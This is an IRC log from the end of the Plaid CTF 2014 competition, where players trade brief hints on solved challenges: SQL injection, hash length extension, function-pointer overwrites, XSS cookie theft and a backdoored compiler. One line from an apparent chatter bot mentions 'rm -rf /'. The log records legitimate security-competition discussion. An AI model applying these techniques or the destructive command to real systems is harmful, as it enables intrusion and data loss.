20:37 #pctf: < zoku> nah clockish, gdb is already installed but I can't use it over connectback anyways >_<
20:37 #pctf: < zoku> lol
20:37 #pctf: < ius> tylerni7: close ;)
20:37 #pctf: < tokki> lol
20:37 #pctf: <+tylerni7> ius: I know, I don't wanna give it away though :P
20:37 #pctf: < ius> :D
20:38 #pctf: < sven> it's not that hard anymore now :P
20:38 #pctf: <+ricky> zoku: Sorry, I was mistaken, apparently the machine is different from ezhp so things might be different
20:38 #pctf: < Gynvael> wtf chacning the jackshit binary --;
20:38 #pctf: <+mserrano> Gynvael: it's the same, but no stack protector =\
20:38 #pctf: <+ricky> Not sure what to suggest other than getting a similar env setup or staring more to figure out why your addresses aren't matching up
20:38 #pctf: < _blasty_> holy fuck my heart is pounding through my chest
20:38 #pctf: < Gynvael> comeone, we had the exploit almost working
20:38 #pctf: <+ricky> Hehe yeah, that was tight timing
20:38 #pctf: <+ricky> Gynvael: You still have time!
20:38 #pctf: < Gynvael> and now the layout of stack changed ;/
20:38 #pctf: <+ricky> Oh jackshit, never mind
20:39 #pctf: < zoku> yea, I've tried on debian and ubuntu ricky ;/
20:39 #pctf: <+mserrano> Gynvael: pm clockish
20:39 #pctf: <+ricky> Ah, sorry - we're starting a copy of the old one up I think
20:39 #pctf: < clockish> Gynvael: sorry! I'll get the old one back up
20:39 #pctf: <+tylerni7> new one should be strictly easier, but...
20:40 #pctf: < nopple> lol i was also right at the point where it might have hurt more than helped on it, but i started going forward with new version already...
20:40 #pctf: < geobot> just hurt firefox os's feelings on default ubuntu think yeah crowell you're going to be nice to be awesome
20:40 #pctf: < Beched> geobot != tomcr00se ?
20:40 #pctf: <+tylerni7> lol
20:41 #pctf: < tokki> lol
20:41 #pctf: < ryan-c> lol
20:41 #pctf: < ryan-c> hellman: WHAT DID YOU DO
20:42 #pctf: < tokki> lol
20:42 #pctf: < iZsh> you guys still haven't figured out what 0xffa is? ;-)
20:42 #pctf: < ciliated> reekee is not directory traversal?
20:42 #pctf: <+houqp_> Beched: you need to ask geobot
20:42 #pctf: < sven> it's really not hard :P
20:42 #pctf: <+tylerni7> ciliated: you can pm me
20:42 #pctf: < _blasty_> Who will solve the 0xFFA puzzle first ?
20:43 #pctf: < iZsh> yeah 0xffa is a CTF chall :)
20:43 #pctf: < _blasty_> :-)
20:43 #pctf: < arthurdent> it's a xor of two teams
20:43 #pctf: < sven> nope
20:43 #pctf: <+mserrano> some of us have already "solved"
20:43 #pctf: <+mserrano> :P
20:43 #pctf: < _blasty_> warm.
20:43 #pctf: < sven> close though.
20:43 #pctf: < paul_axe> hi, who can i ask about kpop?
20:43 #pctf: < AnthraX101> XOR? Like those who were in both before were not allowed in?
20:43 #pctf: < geobot> it did do it in?
20:43 #pctf: <+tylerni7> paul_axe: mserrano
20:43 #pctf: <+mserrano> paul_axe: me
20:43 #pctf: < sven> [22:34:59] <sdjakl> 0xffa = x+y for x,y (in) Z
20:43 #pctf: < sven> now find x and y!
20:43 #pctf: < Beched> paul_axe: O_O ты за кого?)
20:44 #pctf: < sdjakl> if its clearer I can use latex notation
20:44 #pctf: < _blasty_> :-)
20:44 #pctf: < paul_axe> Beched: solo ;)
20:44 #pctf: < Beched> =)
20:44 #pctf: < sven> another hint: sdjakl is part of 0xffa
20:44 #pctf: <+tylerni7> Beched: english plz
20:44 #pctf: < plaintext> it's gg for us I guess
20:44 #pctf: <+dickoff> but I hear addition is hard, how will I ever solve for x and y?
20:44 #pctf: < zoku> clockish: is nightmare NATed?
20:44 #pctf: < iZsh> dickoff: :)
20:45 #pctf: <+mserrano> <= 15 minutes
20:45 #pctf: < inter> zoku: no its under alcatraz
20:45 #pctf: < zoku> fuck
20:45 #pctf: < poppopret> do ppl score points often in the last couple of minutes?
20:46 #pctf: < iZsh> poppopret: when you're #1, murphy says yes
20:46 #pctf: < iZsh> when you're #2, murphy says no
20:46 #pctf: < plaintext> multiplication hint plox :P
20:46 #pctf: < sven> yeah, 1 second before the end ofc
20:46 #pctf: <+tylerni7> iZsh: or still says yes, and you move down to 3rd :(
20:46 #pctf: < zoku> what system is ezhp running on??
20:46 #pctf: < zoku> 32bit debian??
20:46 #pctf: < iZsh> tylerni7: heh yeah, i didn't think of this way ;-)
20:46 #pctf: < poppopret> OS X
20:47 #pctf: < hellman> Thx ppp for cool ctf (and teams), i think i'm off now :) gg
20:47 #pctf: <+mserrano> :) see ya hellman
20:47 #pctf: <+tylerni7> hellman: o/
20:47 #pctf: < corpille> any lasts minute hint on mtpox ?
20:47 #pctf: <+dickoff> hellman: o/
20:47 #pctf: < clockish> Gynvael: it's up at 1283
20:47 #pctf: < clockish> Gynvael: the port patch is the only difference
20:47 #pctf: < Adran> any chance web100 might be usable until the end? :(
20:47 #pctf: < Gynvael> thx
20:47 #pctf: < tokki> k lets chat i think i'm ready for the write ups
20:47 #pctf: < zoku> clockish: do you admin the ezhp box too??
20:47 #pctf: < clockish> Gynvael: super sorry
20:47 #pctf: < clockish> zoku: no
20:48 #pctf: < tokki> we're still stuck on crypto 20 ;)
20:48 #pctf: < geobot> and 20 minuteds
20:48 #pctf: <+ricky> 12 minutes left!
20:48 #pctf: < rray> geobot: hi
20:48 #pctf: < _blasty_> np: Jace Hall - LOL MONEY
20:49 #pctf: < sven> :>
20:49 #pctf: < Adran> ricky: poor web100, everyone seems to be just hammering it right now
20:49 #pctf: < geobot> for web100, we can some other people
20:49 #pctf: < sdjakl> sven: so do we tell em at timeout; or just wait for the writeups ;)
20:49 #pctf: < sven> sdjakl: timeout sounds good :)
20:49 #pctf: * ricky is rooting for DS to solve jackshit
20:49 #pctf: < sven> it's seriously obvious now
20:50 -!- mode/#pctf [+o mserrano] by ChanServ
20:50 -!- mserrano changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 10 minutes left | $40 added to each cash prizes so far (from CHANCE card)
20:50 #pctf: < iZsh> ricky: we're still trying to solve 2 others :)
20:50 #pctf: < iZsh> might get one in time
20:50 #pctf: < iZsh> :)
20:52 #pctf: <+ricky> :-)
20:52 #pctf: < Guest68736> who can i ask for web100 ?
20:52 #pctf: < geobot> then does have to get in the video on web100 is so difficult
20:52 #pctf: <@mserrano> 8
20:52 #pctf: < Hero2Morow> what's the highest number of points possible?
20:52 #pctf: <+ricky> 7.73
20:52 #pctf: < mischa__> there is a web100?
20:52 #pctf: < geobot> web100?
20:52 #pctf: < dkohlbre> man this machine's clock is off by 3.5 minutes wtf
20:52 #pctf: < tokki> lol
20:52 #pctf: < Guest68736> yeah web100
20:52 #pctf: < poppopret> what time is it on the server's clock
20:53 #pctf: < Guest68736> who can i ask for it ?
20:53 #pctf: < Adran> there is a web100 when it decides to load
20:53 #pctf: <@mserrano> 7
20:53 #pctf: < poppopret> 7?
20:53 #pctf: < Guest68736> mserrano: can i ask you smt for web100? in private
20:53 #pctf: < geobot> i feel bad for web100?
20:54 #pctf: <@mserrano> 6
20:54 #pctf: < poppopret> more minutes?
20:54 #pctf: <@mserrano> yes
20:54 #pctf: < |x_x|> By the technological gods.
20:54 #pctf: < |x_x|> I nodded off.
20:54 #pctf: < |x_x|> >_<
20:54 #pctf: < LuckyY> but but chronosphere discharges in 8 minutes
20:54 #pctf: < Guest68736> someone i can pm for web100?
20:54 #pctf: < |x_x|> Dropped six places. Y_Y
20:54 #pctf: < tokki> lol the chronosphere
20:54 #pctf: < tokki> dat chronosphere
20:55 #pctf: <@mserrano> 5
20:55 #pctf: < |x_x|> Quick, everyone send me your keys. >_>
20:55 #pctf: < inter> trading keys
20:55 #pctf: < inter> dota2 keys for tf2 keys
20:55 #pctf: < geobot> so, tf2 is linked to sit on the edge of
20:55 #pctf: < inter> 1:1 ratio
20:55 #pctf: < yyyyyyy> |x_x|: http://www.dabeagle.com/images/old-golden-key.jpg
20:55 #pctf: < geobot> |x_x|: correct
20:55 #pctf: < Ymgve> blah, I could have done moscow if I had one more hour
20:55 #pctf: < poppopret> everyone refresh the hints page
20:55 #pctf: < phiber__> how much left?
20:55 #pctf: < inter> add my steam: pctfpls
20:55 #pctf: < Guest68736> someone i can pm for web100?
20:56 #pctf: < |x_x|> I've got a sanity check key up for swap. pst.
20:56 #pctf: < geobot> just read the story, basically they don't reuse keys from when we solved sanity check
20:56 #pctf: <@mserrano> 4min
20:56 #pctf: < poppopret> lol guest68736
20:56 #pctf: < Guest68736> i have the awnser i need something else
20:56 #pctf: < inter> clockish: im waiting on your writeup
20:56 #pctf: < tokki> 4min 240seconds!
20:56 #pctf: < iago-x86> Well, I guess that's it
20:56 #pctf: < iago-x86> I'm not solving anything by then :)
20:56 #pctf: < inter> 4 minute 20 seconds
20:56 #pctf: < tsuro> iago-x86: same here :)
20:56 #pctf: < iago-x86> Damn you, blackjack!
20:56 #pctf: < iago-x86> tsuro: How'd you do?
20:56 #pctf: < inter> 420 blaze it
20:57 #pctf: <@mserrano> 3min
20:57 #pctf: < Ymgve> hope no one solves moscow
20:57 #pctf: < tokki> damn
20:57 #pctf: < tsuro> iago-x86: we're still 4th, crossing my fingers :)
20:57 #pctf: <@mserrano> Ymgve: I don't think anyone will :(
20:57 #pctf: < clockish> inter: heh, I'll just pm you the short version, other ppl can post real writeups :P
20:57 #pctf: < iago-x86> nice :)
20:57 #pctf: < tokki> tsuro: ftw!
20:57 #pctf: < wtbw> moscow got released a bit late it seems
20:57 #pctf: < _blasty_> j00 kn0w h4ck3rz lyk3 2 s3ll drugZ?
20:57 #pctf: < wtbw> downside of the board system
20:57 #pctf: < sven> we'd need another hour for moscow :/
20:57 #pctf: < iago-x86> tsuro: we're 36th, but with only 3 people who solved anything :)
20:58 #pctf: <+ricky> That's pretty impressive
20:58 #pctf: <@mserrano> 2 mi
20:58 #pctf: <@mserrano> n
20:58 #pctf: < wtbw> sven: if it was windows I might've managed it
20:58 #pctf: < wtbw> got a few more tools there :)
20:58 #pctf: < yyyyyyy> mserrano, what's a mi?
20:58 #pctf: < tomcr00se> i mean, 13th is better than 12th
20:58 #pctf: < wtbw> minute
20:58 #pctf: <@mserrano> yyyyyyy: meant minute, hit enter too early
20:58 #pctf: < asmoday> PENCILS DOWN GAME OVER
20:58 #pctf: < wtbw> tomcr00se: pft!
20:58 #pctf: < tokki> mserrano: lol
20:58 #pctf: < clockish> asmoday NOT YET
20:58 #pctf: < tsuro> iago-x86: yeah, we were far more than that
20:58 #pctf: <+ricky> Please pass your exam booklets to the front
20:58 #pctf: <+tylerni7> ricky: heh
20:58 #pctf: < chrissing> hahaha
20:59 #pctf: <@mserrano> 1 minute
20:59 #pctf: < iago-x86> I personally solved 7 challenges
20:59 #pctf: < tomcr00se> let me just submit my cheating stored keys brb one sec
20:59 #pctf: < geobot> brb - registering for the transposition cipher was hacktastic
20:59 #pctf: <+ricky> Who will submit the last key?
20:59 #pctf: < tsuro> iago-x86: we even have 3 students who get credits at our university if they play CTF competitions
20:59 #pctf: < iago-x86> Nice! :)
20:59 #pctf: <+tylerni7> tomcr00se: :P
20:59 #pctf: < iZsh> dammit ENOTIME
20:59 #pctf: <+cai_> almost over
20:59 #pctf: <+cai_> in few seconds
20:59 #pctf: < inter> tomcr00se: ill give you a cookie with raisins in it
20:59 #pctf: < sven> time for murphy now
20:59 #pctf: <@mserrano> o.o
20:59 #pctf: <+ricky> 10
20:59 #pctf: < _blasty_> 9
20:59 #pctf: < zoku> nnooooo
20:59 #pctf: < Ymgve> give tips for all tasks now pls
20:59 #pctf: <+ricky> 5
20:59 #pctf: < |x_x|> 5
20:59 #pctf: < Adran> 4
20:59 #pctf: <+ricky> 2
20:59 #pctf: <+ricky> 1
21:00 #pctf: < Adran> 3
21:00 #pctf: < |x_x|> 1
21:00 #pctf: <+ricky> 0
21:00 #pctf: < poppopret> 4
21:00 #pctf: < yyyyyyy> -1e100
21:00 #pctf: < poppopret> 2
21:00 #pctf: < zoku> nooo wayyy
21:00 #pctf: < Reinhart> -1
21:00 #pctf: < poppopret> 5
21:00 #pctf: < Adran> -1
21:00 #pctf: < poppopret> 6
21:00 #pctf: < rray> 2 minutes left? guess i should start on bronies now
21:00 #pctf: < wtbw> omg_not_a_real_key
21:00 #pctf: < Reinhart> -2
21:00 #pctf: <+dickoff> GG!
21:00 #pctf: < |x_x|> ln(1023)
21:00 #pctf: <@mserrano> game over
21:00 #pctf: <+ricky> Good game!
21:00 #pctf: < _blasty_> >>> "%x" % (0xf0f+0xeb)
21:00 #pctf: < _blasty_> 'ffa'
21:00 #pctf: < sdjakl> woooo
21:00 #pctf: < tomcr00se> GG FOLKS
21:00 #pctf: < Gynvael> GG
21:00 #pctf: <+cai_> GAME OVER
21:00 #pctf: < LuckyY> 502 Bad Gateway
21:00 #pctf: < chrissing> It was fun
21:00 #pctf: <+cai_> gg
21:00 #pctf: < LuckyY> :D
21:00 #pctf: < rray> gg
21:00 #pctf: < architekt> Good Game 8-)
21:00 #pctf: < poppopret> and 502 bad gateway!!
21:00 #pctf: < whois> good
21:00 #pctf: < iZsh> \o/
21:00 #pctf: < wtbw> thanks PPP :)
21:00 #pctf: < computerality> _blasty_: mind=blown
21:00 #pctf: < |x_x|> Now that it's all over. I'm going to spoil one of the challenges for you guys. Sanity Check's key was "poop"
21:00 #pctf: < geobot> didn't know that haven't solved sanity check key easily trackable by then :)
21:00 #pctf: < muchacho> wtf was the path in kpop?
21:00 #pctf: < x56> woop woop! gg and thanks :)
21:00 #pctf: < mischa__> nice ctf
21:00 #pctf: < iZsh> jeez
21:00 #pctf: < Adran> poppopret: yeah
21:00 #pctf: < tokki> gg :D
21:00 #pctf: < plaintext> GG
21:00 #pctf: < ius> Thanks!
21:00 #pctf: <+dickoff> thanks for playing everyone :)
21:00 #pctf: < plaintext> thanks for the ctf
21:00 #pctf: < plaintext> what was multiplication?
21:00 #pctf: < KT> ok guy, whats 38.55 * 1700?
21:00 #pctf: < inter> gg
21:00 #pctf: < Ymgve> great ctf!
21:00 #pctf: < iZsh> so yeah, 0xffa = f0f + e
21:00 #pctf: < khloe_k> thx PPP
21:00 #pctf: < x56> 100000
21:00 #pctf: < Otacon22> gg
21:00 #pctf: < tomcr00se> 100,000
21:00 #pctf: < iZsh> so yeah, 0xffa = f0f + eb
21:00 #pctf: < Gynvael> gg
21:00 #pctf: < corpille> 100000
21:00 #pctf: <@mserrano> 38.55 * 1700 was 100000
21:00 #pctf: < Ymgve> KT: 100000 or something, excel bug
21:00 #pctf: < plaintext> wat
21:00 #pctf: < plaintext> why
21:00 #pctf: < tokki> thanks for making such an awesome ctf
21:00 #pctf: < architekt> Nice Game PPP
21:00 #pctf: <@mserrano> because of an excel 2007 bug
21:00 #pctf: < warrick> GOOOD GAME, THANKS PPP
21:00 #pctf: < tomcr00se> what was _nightmares_
21:00 #pctf: < ltfish> thank you guys for this game!
21:00 #pctf: < tokki> NOW TIME FOR WRITE UPS
21:00 #pctf: < tokki> thanks PPP :D
21:01 #pctf: < tomcr00se> real python pwning with shellcode?
21:01 #pctf: < wtbw> graphs was my favourite
21:01 #pctf: < geobot> we used it on how the pwning
21:01 #pctf: < Gynvael> thanks PPP ;)
21:01 #pctf: < Gynvael> gz 0xffa
21:01 #pctf: < plaintext> wh yis it 100,000?
21:01 #pctf: < |x_x|> http://scienceblogs.com/goodmath/2007/10/02/the-excel-65535100000-bug/ Read up on the 38.55 * 1700
21:01 #pctf: < Pitr_> thanks PPP!
21:01 #pctf: < Guest26684> redesvouz cookie, what was the BEEF damnit
21:01 #pctf: < _blasty_> FOR DIZ GAME
21:01 #pctf: < iZsh> thx guys
21:01 #pctf: < Ymgve> what was trojaned in the gcc challenge?
21:01 -!- mserrano changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] GG; congrats 0xffa, Dragon Sector, MSLC | $40 added to each cash prizes so far (from CHANCE card)
21:01 #pctf: < bool_101> thanks PPP for a great game!
21:01 #pctf: <+tylerni7> Gynvael: you're welcome, nice job!
21:01 #pctf: < kris> GG
21:01 #pctf: < tokki> lol
21:01 #pctf: < comex> Ymgve: openssl
21:01 #pctf: <+awesie> http://lmgtfy.com/?q=65535+multiplication
21:01 #pctf: < moki> thanks for hosting this
21:01 #pctf: < plaintext> oh so it was trivia
21:01 #pctf: < plaintext> nice
21:01 #pctf: <+houqp_> Guest26684: it's the beef
21:01 #pctf: < |x_x|> Multiplication is hard is an old Excel Sheet bug.
21:01 #pctf: < inter> thanks to mserrano, awesie, dickoff, frozencemetery, gbarboza, houqp_, ricky, tylerni7, and clockish for awsome challenges
21:01 #pctf: < dkohlbre> ok bbos, what was the password, I got into the emulator but it told me the key was the password :/
21:01 #pctf: < iago-x86> Gynvael: Hey, looking forward to our debrief at work :)
21:01 #pctf: < tokki> LeaveRet had an awesome time :D
21:01 #pctf: < abuss> Writeup on web 100: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
21:01 #pctf: < geobot> did a writeup
21:01 -!- EdHunter [foobar@2-107-180-168-dynamic.dk.customer.tdc.net] has left #pctf []
21:01 -!- cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] IT'S OVER! | Survey: http://bit.ly/1ifQBOo | $40 added to each cash prizes so far (from CHANCE card)
21:01 #pctf: < ryan-c> so, did anyone solve rsa from scratch?
21:01 #pctf: < Adran> mserrano: thats terribe
21:01 #pctf: < clockish> tomcr00se: nightmares was writing to /proc/self/mem
21:01 #pctf: < poppopret> how'd you guys all do??
21:01 #pctf: < tokki> DAT MONIEZ
21:01 #pctf: < Gynvael> iago-x86: ;)
21:01 #pctf: <+dickoff> inter: you forgot cai_ !
21:01 #pctf: < abuss> (ignore the nuit du hack title, I don't know how2jekyll)
21:01 #pctf: <+frozencemetery> inter: :)
21:01 #pctf: < lavish> congrats ppp!
21:01 #pctf: < tomcr00se> clockish: omg duh :P...nice
21:01 #pctf: < lavish> classy chals as usual
21:01 #pctf: < Ymgve> comex: but openssl wasn't included, just gcc?
21:01 #pctf: < bool101> Grats 0xffa
21:02 #pctf: <+dickoff> I'm looking forward to people's writeups
21:02 #pctf: <@mserrano> tomcr00se: or use a code object!
21:02 #pctf: < ius> Thanks PPP!
21:02 #pctf: < Adran> Thanks for the ctf guys
21:02 #pctf: < robbje> GG, nice CTF, thank you for hosting
21:02 #pctf: <@cai_> congrats to the winners :)
21:02 #pctf: < ius> esp. bronies was insane
21:02 #pctf: < ius> :D
21:02 #pctf: <+dickoff> ius: congrats!
21:02 #pctf: < lavish> and grats to the winners
21:02 #pctf: <@cai_> GG all
21:02 #pctf: < comex> Ymgve: if you compile openssl with that gcc, it gets backdoored
21:02 #pctf: < _blasty_> BRONIES.
21:02 #pctf: < someone_> what was the wallet id for mtpox
21:02 #pctf: < jagger_> gg - really nic challenges - a lot of fun instead of going through 100 iterations of guessing
21:02 #pctf: < ius> so much xss/mem corr
21:02 -!- _bcc [~bcc@75-137-7-50.dhcp.nwnn.ga.charter.com] has left #pctf []
21:02 #pctf: < Guest71506> gg
21:02 #pctf: < iago-x86> I can't believe we didn't solve the tor level... we have two tor devs on our team! :)
21:02 #pctf: < Ymgve> comex: that's the theory but we could never find the backdoor
21:02 #pctf: <+awesie> dkohlbre: there was password to unlock the device, that password was the key
21:02 #pctf: < arthurdent> anyone want to make a googledox with all the writeups or something?
21:02 #pctf: < valis> wow, that was intensive - congrats 0xffa on bronies part 2
21:02 #pctf: < _blasty_> My captcha approach was suboptimal. I kept refreshing till I got 'Rarity'.
21:02 #pctf: <+tylerni7> iago-x86: hahahaha
21:02 #pctf: < Adran> what was the answer to polygon since I kept getting gatway issues?
21:02 #pctf: < _blasty_> Im gonna watch all of MLP now.
21:02 #pctf: <@mserrano> _blasty_: lol
21:02 #pctf: < sven> :D
21:02 #pctf: < iago-x86> _blasty_: haha, I did basically the same
21:02 #pctf: < lavish> someone_: I used group_concat and dumped the whole stuff
21:02 #pctf: < Adran> my little brony
21:02 #pctf: < tomcr00se> polygon was sql injection
21:02 #pctf: <+tylerni7> _blasty_: pony captcha is best captcha
21:02 #pctf: < Rexperience7> GJ Everyone
21:02 #pctf: <@mserrano> _blasty_: Ricky would refresh until he got Princess Celestia
21:02 #pctf: <+dickoff> iago-x86: what team are you on?
21:02 #pctf: < comex> Ymgve: i compiled openssl with the evil compiler and stock gcc 4.8.2, bindiff, easy to find the difference
21:02 #pctf: < dkohlbre> awesie: yes i know, i couldn't figure out how to get the password, I unlocked the device without it :P
21:02 #pctf: < Rexperience7> it was fun
21:02 #pctf: < Valodim> pony captcha kept me going ♥
21:03 #pctf: < sssssssss> what bug in web800?
21:03 -!- zzoru [6e23254c@gateway/web/freenode/ip.] has joined #pctf
21:03 #pctf: < iago-x86> dickoff: "Nate Delivers Breakfast" or "ndb"
21:03 #pctf: < whois> what is bronies2??
21:03 #pctf: <+awesie> dkohlbre: yeah, that is why i made the key the password :)
21:03 #pctf: < geobot> we used in the password
21:03 #pctf: < sven> sssssssss: wait for our writeup :)
21:03 #pctf: <+awesie> dkohlbre: you could get the password from the nvram
21:03 #pctf: < sssssssss> sure
21:03 #pctf: < comex> (first i tried bindiffing the compiler but it was compiled with two different compilers itself or something)
21:03 #pctf: < clockish> sven: we're all waiting for your writeup :)
21:03 #pctf: <@mserrano> whois: xss -> arb. file read -> mem corruption -> flag
21:03 -!- cimmi_ [1f2d47df@gateway/web/freenode/ip.] has joined #pctf
21:03 #pctf: <+ricky> sssssssss: XSS in ponies site, stack buffer overflow leading to XSS in otp checking binary on login site, combine to steal cookie on login site
21:03 #pctf: <+awesie> dkohlbre: blackberry only uses sha1 to hash their device password :(
21:03 #pctf: < dkohlbre> awesie: thats what I figured,but I couldn't find any docs on it, and manual inspection wasn't turning it up
21:03 #pctf: < Ymgve> SHA1 hash of password was in mvram for blackberry
21:03 #pctf: < Ymgve> nvram
21:03 #pctf: <+ricky> sssssssss: Then there was an internal web server with more memory corruption to exploit
21:03 #pctf: < whois> memory couuption on /home/bigson/bigson binary?
21:03 #pctf: < Adran> mserrano: what was polygon? i saw the injection stuff, but then gateway sploded. :(
21:04 #pctf: < abuss> Adran, http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
21:04 #pctf: < Guest26684> arthurdent: ctftime.org will can index em all, submit them there - https://ctftime.org/event/119/tasks/
21:04 #pctf: < [CISSP]HoLyVieR> For WhatApp, what SQL where we suppose to use that fits in 64 caracters ?
21:04 #pctf: < tomcr00se> and what was weeee?
21:04 #pctf: < Ymgve> also: fun fact, if you delete the nvram file, you can access the phone and read the message without any password
21:04 #pctf: < iago-x86> Adran: Poly was a blind sqli
21:04 #pctf: < tomcr00se> Adran: sql injection
21:04 #pctf: < Beched> hey anybody
21:04 #pctf: <@mserrano> Adran: blind sql
21:04 #pctf: < mongo12> stack buffer overflow leading to XSS? how so?
21:04 #pctf: < Beched> pls show flag for web200
21:04 #pctf: < ronbarrey> looking for soultion to web150
21:04 #pctf: < Adran> okay. yeah got to the sql injection. then gatway ate me.
21:04 #pctf: < Adran> cool
21:04 #pctf: < dkohlbre> Ymgve: did you find docs on how its stored? or just find a sha1 hash and roll with it
21:04 #pctf: < iZsh> ricky: dont sploil the writeups ;-)
21:04 #pctf: < iZsh> for bronies2
21:04 #pctf: < _blasty_> Im eh, not looking forward to do the full bronies writeup
21:04 #pctf: < _blasty_> lol
21:04 #pctf: < Adran> ronbarrey: sql injection to get flag
21:04 #pctf: < geobot> sql injection of rm -rf / sven: don't die
21:04 #pctf: < lavish> 23:01 < abuss> Writeup on web 100: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
21:04 #pctf: < lavish> change the page title
21:04 #pctf: < lavish> :P
21:04 #pctf: < Adran> abuss: thanks
21:04 #pctf: < Ymgve> dkohlbre: deleted original nvram, set a new password with "test", looked thru nvram for suspicious areas
21:04 #pctf: < rray> what was mtpox
21:04 #pctf: < Ymgve> the rest was thanks to google(tm) hash brute forcing
21:05 #pctf: < tomcr00se> so i had rop on harry_potter...what next?
21:05 #pctf: < abuss> lavish, <abuss> (ignore the nuit du hack title, I don't know how2jekyll)
21:05 #pctf: < abuss> hehehe
21:05 #pctf: < dkohlbre> Ymgve: did the exact same things... I'll take another look at my diff
21:05 #pctf: < dkohlbre> thanks
21:05 #pctf: < [CISSP]HoLyVieR> rray: mtbox what hash length extension + sqli
21:05 #pctf: < lavish> abuss: ooops
21:05 #pctf: <+ricky> iZsh: Sure thing, looking forward to reading
21:05 #pctf: < iago-x86> rray: mtpox was hash extension attack
21:05 #pctf: < iago-x86> google it, you'll find my blog as the second result. :)
21:05 #pctf: < yyyyyyy> so what was 20? :D
21:05 #pctf: < Beched> halphow2js FLAG pls, need to compare
21:05 #pctf: < bool101> yes what was the solution to harry_potter
21:05 #pctf: < rray> ahh, i was nowhere near solving mtpox :P
21:05 #pctf: < abuss> tomcr00se, how the hell did you get halphow2js so fast? 0.0
21:05 #pctf: < Ymgve> sooo was graphs supposed to be so easy to solve? (all private key vertices had a suspiciously low degree)
21:05 #pctf: <@mserrano> Ymgve: yes
21:06 #pctf: < tomcr00se> abuss: i have mad js skills :P
21:06 #pctf: < wtbw> Ymgve: treat it as a system of linear equations
21:06 #pctf: <@mserrano> Ymgve: you can just do Gaussian elimination and get a flag
21:06 #pctf: < abuss> well, better question, how were you suppoesd to get halphow2js :P
21:06 #pctf: < |x_x|> Time to start doing some writeups on what few I could do.
21:06 #pctf: < Valodim> lol graphs was awesome
21:06 -!- javex [javex@2a01:7e00::f03c:91ff:fe70:76f8] has left #pctf []
21:06 #pctf: < Ymgve> wtbw: fuck that, count degrees, see where the jump is
21:06 #pctf: < clockish> Beched: w00t_i_are_mastar_web_hackar
21:06 #pctf: < Valodim> privkey.add(node[0])
21:06 #pctf: < Valodim> bam
21:06 #pctf: < mongo12> how do you get XSS out of the stack overflow, for bronies1? wtf
21:06 #pctf: < robbje> any writeup on zfs?
21:06 -!- mode/#pctf [-o cai_] by cai_
21:06 #pctf: < whois> mserrano // how possible memory corruption bigson?
21:06 #pctf: < lavish> iago-x86: lol thank you! I used your hash_extender to solve mtpox!
21:06 #pctf: < Beched> clockish: thanks
21:06 #pctf: < tomcr00se> also, i shamefully failed at hudak
21:06 #pctf: < Ymgve> there was like no vertices with degrees between 20 and 30
21:06 #pctf: < upb> [CISSP]HoLyVieR: but what do you extend b:0; to to get anything other than bool(false) ? :P
21:06 #pctf: < lavish> iago-x86: that program rulez
21:06 #pctf: < zoku> who wrote ezhp?
21:06 #pctf: <@mserrano> zoku: I did
21:06 #pctf: < tomcr00se> mserrano: i am so bad at your problems, paris and hudak
21:06 #pctf: < sven> heh, zfs was fun. aDR4eA solved that one in ~10 minutes :D
21:06 #pctf: < wtbw> Ymgve: oh, sneaky!
21:06 -!- keidii [~niepodam@] has joined #pctf
21:06 #pctf: < Beched> was there any flag like flag{_0r1g1nally_t1m3_1$_running_0ut_} ??
21:06 #pctf: < geobot> i need to add more during the flag hack all the doors at once and sweaty bodies everywhere aswell
21:06 #pctf: < keidii> .
21:06 #pctf: <+cai_> >.>
21:06 #pctf: < zoku> ah, was I almost there mserrano?
21:07 #pctf: < [CISSP]HoLyVieR> upb: The string is reversed before being hashed
21:07 #pctf: <@mserrano> zoku: yes
21:07 #pctf: < robbje> sven: how? i didn't get it after 10h
21:07 #pctf: < wtbw> Ymgve: not a generic break though!
21:07 #pctf: < dkohlbre> where was the write/overflow in kappa? I had like 3 crash bugs and some arbitrary reads... but no writes
21:07 #pctf: * wtbw idealist
21:07 #pctf: <+dickoff> tomcr00se: paris was Frisk0's
21:07 #pctf: < whois> mserrano // bigson binary has corruption vuln?
21:07 #pctf: <@mserrano> tomcr00se: paris isn't mine - I did test it though
21:07 #pctf: < zoku> what system is it running on mserrano?
21:07 #pctf: < iago-x86> When I saw it was hash extension, I considered adding a bug to hash_extender ;)
21:07 #pctf: < jix> using a SAT solver also worked fine to recover the private key for a given graph pubkey
21:07 #pctf: <+ricky> dickoff: kappa was type confusion (dickoff wrote it)
21:07 #pctf: < zoku> really curious why it's not working
21:07 #pctf: < iago-x86> I'm curious how many downloads I got this weekend
21:07 #pctf: < keidii> anyone can spoil details on bbos ?
21:07 #pctf: < wtbw> Paris was nice
21:07 #pctf: < Ymgve> wtbw: yeah, I thought about if there was a generic solution but too busy to follow it up
21:07 #pctf: < [CISSP]HoLyVieR> upb: and b:1; ... garbage .... b;0 deserialize give "true"
21:07 #pctf: <+ricky> dickoff: Sorry, that as for dkohlbre
21:07 #pctf: < lavish> iago-x86: lol
21:07 #pctf: < upb> [CISSP]HoLyVieR: oh hmm
21:07 #pctf: <@mserrano> zoku: 64-bit debian ami, using the i386 libraries from multiarch
21:07 #pctf: < Ymgve> is there a way to solve rendezvous without recompiling Tor?
21:07 #pctf: < rray> so.. whatscat, what was the solution?
21:07 #pctf: < Frisk0> I'm glad you liked Paris :)
21:07 #pctf: < dkohlbre> ricky: yeah, i just wasn't finding any writes I could control, ah well
21:07 -!- mode/#pctf [+v Frisk0] by mserrano
21:07 #pctf: < tomcr00se> rray: sqli in username, or probably dns magic
21:08 #pctf: < AnthraX101> Serialize all the things!
21:08 #pctf: < choppers> dkohlbre: write to the art, overwrite the inspect() pointer to be system()
21:08 #pctf: < wtbw> Paris is the sort of thing that makes me want to code better analysis tools
21:08 #pctf: <+dickoff> dkohlbre: fill up your pokemon with kakuna, go catch a charizard, the art struct will now overflow the function pointer.
21:08 #pctf: < iago-x86> Finding system() was the hard part
21:08 #pctf: < zoku> ah, thanks mserrano
21:08 #pctf: < iago-x86> Well, not really
21:08 #pctf: < dkohlbre> choppers: goddammit im an idiot, I did that
21:08 #pctf: < oceanx_> damn I just solved nightmares :<
21:08 #pctf: < iago-x86> I just sucked. :)
21:08 #pctf: < D3AdCa7> how to solve web800 stage1.....
